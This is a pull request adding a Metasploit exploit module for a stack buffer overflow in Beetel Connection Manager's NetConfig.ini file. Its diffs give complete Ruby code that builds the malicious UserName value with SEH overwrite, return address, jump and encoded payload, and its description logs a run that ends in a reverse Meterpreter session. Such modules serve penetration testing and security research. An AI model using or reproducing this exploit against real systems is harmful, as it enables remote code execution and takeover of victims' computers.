### PR TITLE
Beetel Connection Manager NetConfig.ini BOF

### DIFF
--- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
@@ -64,7 +64,7 @@ class Metasploit4 < Msf::Exploit
     junk = rand_text(target["Offset"])
     seh = generate_seh_record(target.ret)
     jump = Rex::Arch::X86.jmp_short(66)
-    padding = rand_text(66)
+    padding = rand_text(66) # Pad past buffer corruption
 
     junk << seh << jump << padding << payload.encoded
   end

--- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class Metasploit4 < Msf::Exploit
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
+      'Description' => %q{
+        This module exploits a stack-based buffer overflow in the UserName
+        parameter in the NetConfig.ini file for Beetel Connection Manager.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        "metacom", # Vuln/PoC
+        "wvu" # Metasploit
+      ],
+      'References' => [
+        ["OSVDB", "98714"],
+        ["EDB", "28969"]
+      ],
+      'Payload' => {
+        "Space" => 1504,
+        "BadChars" => "\x00\x09\x0a\x0b\x0c\x0d\x20",
+        "DisableNops" => true
+      },
+      'Platform' => "win",
+      'Targets' => [
+        ["PCW_BTLINDV1.0.0B04 (WinXP SP3)", {
+          "Offset" => 468,
+          "Ret" => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0)
+        }]
+      ],
+      'Privileged' => false,
+      'DisclosureDate' => "Oct 12 2013",
+      'DefaultTarget' => 0
+    ))
+
+    register_options([
+      OptString.new("FILENAME", [true, "INI file", "NetConfig.ini"]),
+      OptString.new("SECTION", [true, "Section name", "Edit Me"])
+    ], self.class)
+  end
+
+  def exploit
+    section = datastore["SECTION"]
+
+    sploit = "[#{section}]\r\n" \
+             "UserName=#{shell_popper}"
+
+    file_create(sploit)
+  end
+
+  def shell_popper
+    junk = rand_text(target["Offset"])
+    seh = generate_seh_record(target.ret)
+    jump = Rex::Arch::X86.jmp_short(66)
+    padding = rand_text(66)
+
+    junk << seh << jump << padding << payload.encoded
+  end
+
+end

--- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
+++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb
@@ -35,7 +35,7 @@ class Metasploit4 < Msf::Exploit
       },
       'Platform' => "win",
       'Targets' => [
-        ["PCW_BTLINDV1.0.0B04 (WinXP SP3)", {
+        ["PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)", {
           "Offset" => 468,
           "Ret" => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0)
         }]


### PR DESCRIPTION
```
msf > use exploit/windows/fileformat/beetel_netconfig_ini_bof 
msf exploit(beetel_netconfig_ini_bof) > info 

       Name: Beetel Connection Manager NetConfig.ini Buffer Overflow
     Module: exploit/windows/fileformat/beetel_netconfig_ini_bof
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  metacom
  wvu

Available targets:
  Id  Name
  --  ----
  0   PCW_BTLINDV1.0.0B04 (WinXP SP3)

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  NetConfig.ini    yes       INI file
  SECTION   Edit Me          yes       Section name

Payload information:
  Space: 1504
  Avoid: 7 characters

Description:
  This module exploits a stack-based buffer overflow in the UserName 
  parameter in the NetConfig.ini file for Beetel Connection Manager.

References:
  http://www.osvdb.org/98714
  http://www.exploit-db.com/exploits/28969

msf exploit(beetel_netconfig_ini_bof) > exploit 

[+] NetConfig.ini stored at /home/wvu/.msf4/local/NetConfig.ini
msf exploit(beetel_netconfig_ini_bof) > use exploit/multi/handler 
msf exploit(handler) > exploit 

[*] Started reverse handler on 10.6.0.198:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.6.0.198
[*] Meterpreter session 1 opened (10.6.0.198:4444 -> 10.6.0.198:32816) at 2013-10-28 22:56:48 -0500

meterpreter > 
```
